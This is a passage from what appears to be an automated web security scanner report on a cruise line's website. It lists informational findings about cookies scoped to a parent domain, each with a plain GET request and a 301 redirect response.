Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:03 GMT
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:03 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:03 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.41. http://www2.ncl.com/destination/europe/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/europe/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:02 GMT
Content-Length: 262
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.42. http://www2.ncl.com/destination/europe/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/ports/map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/europe/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:02 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.43. http://www2.ncl.com/destination/europe/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/questions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/europe/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:05 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:05 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:05 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:05 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.44. http://www2.ncl.com/destination/europe/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/stories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/europe/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:04 GMT
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:04 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:04 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:04 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.45. http://www2.ncl.com/destination/europe/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/vacations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/europe/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:09 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:09 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.46. http://www2.ncl.com/destination/hawaii/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/excursions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/hawaii/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:10 GMT
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:10 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.47. http://www2.ncl.com/destination/hawaii/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/hotel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/hawaii/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:13 GMT
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:13 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:13 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:13 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.48. http://www2.ncl.com/destination/hawaii/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/hawaii/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:09 GMT
Content-Length: 262
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:09 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:09 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.49. http://www2.ncl.com/destination/hawaii/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/ports/map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/hawaii/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:10 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:10 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.50. http://www2.ncl.com/destination/hawaii/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/questions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/hawaii/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:16 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:16 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.51. http://www2.ncl.com/destination/hawaii/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/stories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/hawaii/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:16 GMT
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:16 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.52. http://www2.ncl.com/destination/hawaii/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/vacations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/hawaii/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:16 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:16 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.53. http://www2.ncl.com/destination/pacific_coastal/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/excursions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/pacific_coastal/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:19 GMT
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:19 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:19 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:19 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.54. http://www2.ncl.com/destination/pacific_coastal/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/hotel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/pacific_coastal/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:21 GMT
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:21 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:21 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:21 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.55. http://www2.ncl.com/destination/pacific_coastal/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/pacific_coastal/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:18 GMT
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:18 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:18 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:18 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.56. http://www2.ncl.com/destination/pacific_coastal/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/ports/map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/pacific_coastal/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:20 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:20 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:20 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:20 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.57. http://www2.ncl.com/destination/pacific_coastal/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/questions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/pacific_coastal/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:24 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:24 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.58. http://www2.ncl.com/destination/pacific_coastal/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/stories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/pacific_coastal/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:22 GMT
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:22 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:22 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:22 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.59. http://www2.ncl.com/destination/pacific_coastal/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/vacations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/pacific_coastal/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:24 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:24 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.60. http://www2.ncl.com/destination/panama_canal/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/excursions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/panama_canal/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:36 GMT
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:36 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:36 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:36 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.61. http://www2.ncl.com/destination/panama_canal/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/hotel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/panama_canal/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
